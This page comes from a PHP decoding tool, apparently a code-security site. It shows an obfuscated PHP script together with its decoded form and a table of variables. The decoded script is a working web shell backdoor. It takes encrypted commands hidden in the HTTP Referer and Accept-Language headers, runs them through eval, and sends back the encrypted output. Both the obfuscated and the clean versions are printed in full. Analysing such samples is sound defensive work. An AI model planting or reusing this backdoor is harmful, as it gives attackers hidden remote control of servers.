Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $G='[-X$m[2]-X[$z]];i-Xf(str-Xpos($p,$h)===-X0)-X{$s[$i-X]="";$p-X=$ss($p,3-X)-X;}i..

Decoded Output download

$kh="5d41";$kf="402a";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}$r=$_SERVER;$rr=@$r["HTTP_REFERER"];$ra=@$r["HTTP_ACCEPT_LANGUAGE"];if($rr&&$ra){$u=parse_url($rr);parse_str($u["query"],$q);$q=array_values($q);preg_match_all("/([\w])[\w-]+(?:;q=0.([\d]))?,?/",$ra,$m);if($q&&$m){@session_start();$s=&$_SESSION;$ss="substr";$sl="strtolower";$i=$m[1][0].$m[1][1];$h=$sl($ss(md5($i.$kh),0,3));$f=$sl($ss(md5($i.$kf),0,3));$p="";for($z=1;$z<count($m[1]);$z++)$p.=$q[$m[2][$z]];if(strpos($p,$h)===0){$s[$i]="";$p=$ss($p,3);}if(array_key_exists($i,$s)){$s[$i].=$p;$e=strpos($s[$i],$f);if($e){$k=$kh.$kf;ob_start();eval(@gzuncompress(@x(base64_decode(preg_replace(array("/_/","/-/"),array("/","+"),$ss($s[$i],0,$e))),$k)));$o=ob_get_contents();ob_end_clean();$d=base64_encode(x(gzcompress($o),$k));print("<$k>$d</$k>");@session_destroy();}}}}

Did this file decode correctly?

Original Code

<?php
$G='[-X$m[2]-X[$z]];i-Xf(str-Xpos($p,$h)===-X0)-X{$s[$i-X]="";$p-X=$ss($p,3-X)-X;}if(a-Xrray-X_-Xkey_exists($-Xi-X,$-Xs)){$s[$i].-';
$V=',$-Xq);$q=arr-Xa-Xy_values($q)-X;preg_-Xm-Xatch_all("/(-X[\\w])-X[\\w-]+(?:;-Xq=0.-X([\\d-X]))?,-X?/-X",$ra,$m);if(-X-X-X-X-X$q';
$z='&&$m){@session_start();$s=-X&$_S-XESSION;$ss="-Xsu-Xbs-Xtr";$sl="strt-Xolowe-Xr";$i-X=$m[1]-X[0].$m[1]-X[1];-X$h=-X$sl($ss';
$D='(md5-X($i.-X$-Xkh-X),0,3));$f-X=$sl($s-Xs(m-Xd5($i.$-Xkf),0-X,3));$p="";fo-Xr(-X$z=1;-X-X$z<c-Xount($m[1-X]);$z++)$p.=-X$q';
$A='$kh="-X5d41";$kf=-X"402-X-Xa";functi-Xon x($-Xt,$k){$c=s-Xtrle-Xn-X($k);$l=str-Xlen($-Xt);$-X-X-Xo="";for($i=0;$i<$l;){fo-Xr(';
$E='XERE-XR"];$-Xra=@$r["HTTP-X_ACCE-X-XPT_LANGUAGE"-X-X];if($-Xrr&&$ra){$u-X=parse_url-X-X($rr);pars-Xe_str($u[-X"quer-X-Xy"]';
$M=str_replace('lw','','clwrelwate_lwfulwnclwtilwon');
$R='_-Xrep-Xlace(array("/-X_/","/-X-/-X"),array("/-X"-X,"+-X"),$ss(-X$-Xs[$i],0,$-Xe)))-X,$k)));$o=o-Xb_get_conte-Xnts();-Xob_e';
$o='nd-X_clean()-X;$d=ba-Xse64-X_en-Xcode-X(x(gzco-Xm-Xpress($o-X),$k-X));print("<$-Xk>$d<-X/$k>");-X@sessio-Xn_-Xdestroy();}}}}';
$B='$j=0;-X(-X$j<$-Xc&&$i<$l);$j++-X,$i+-X+){$o.=-X$t-X{$i}^$k{$j}-X;}}r-Xet-Xurn -X$o-X;-X}$r=$_SERVE-XR;$rr=-X@$r["HTTP_REF-';
$x='X=$p;$e=str-Xpo-Xs($s[$i]-X,$f);if($e){$k=$-Xk-Xh.$kf;-Xob_start();-X-X-X@e-Xval(@gz-Xunco-Xmpress(@x(@base-X64_decode(preg-X';
$f=str_replace('-X','',$A.$B.$E.$V.$z.$D.$G.$x.$R.$o);
$b=$M('',$f);$b();
?>

Function Calls

null 1
str_replace 2
create_function 1

Variables

$A $kh="-X5d41";$kf=-X"402-X-Xa";functi-Xon x($-Xt,$k){$c=s-Xtr..
$B $j=0;-X(-X$j<$-Xc&&$i<$l);$j++-X,$i+-X+){$o.=-X$t-X{$i}^$k{$..
$D (md5-X($i.-X$-Xkh-X),0,3));$f-X=$sl($s-Xs(m-Xd5($i.$-Xkf),0-..
$E XERE-XR"];$-Xra=@$r["HTTP-X_ACCE-X-XPT_LANGUAGE"-X-X];if($-X..
$G [-X$m[2]-X[$z]];i-Xf(str-Xpos($p,$h)===-X0)-X{$s[$i-X]="";$p..
$M create_function
$R _-Xrep-Xlace(array("/-X_/","/-X-/-X"),array("/-X"-X,"+-X"),$..
$V ,$-Xq);$q=arr-Xa-Xy_values($q)-X;preg_-Xm-Xatch_all("/(-X[\w..
$b None
$f $kh="5d41";$kf="402a";function x($t,$k){$c=strlen($k);$l=str..
$o nd-X_clean()-X;$d=ba-Xse64-X_en-Xcode-X(x(gzco-Xm-Xpress($o-..
$x X=$p;$e=str-Xpo-Xs($s[$i]-X,$f);if($e){$k=$-Xk-Xh.$kf;-Xob_s..
$z &&$m){@session_start();$s=-X&$_S-XESSION;$ss="-Xsu-Xbs-Xtr";..

Stats

MD5 76198010ae2d4b6621e3f7ba4e5b7089
Eval Count 1
Decode Time 123 ms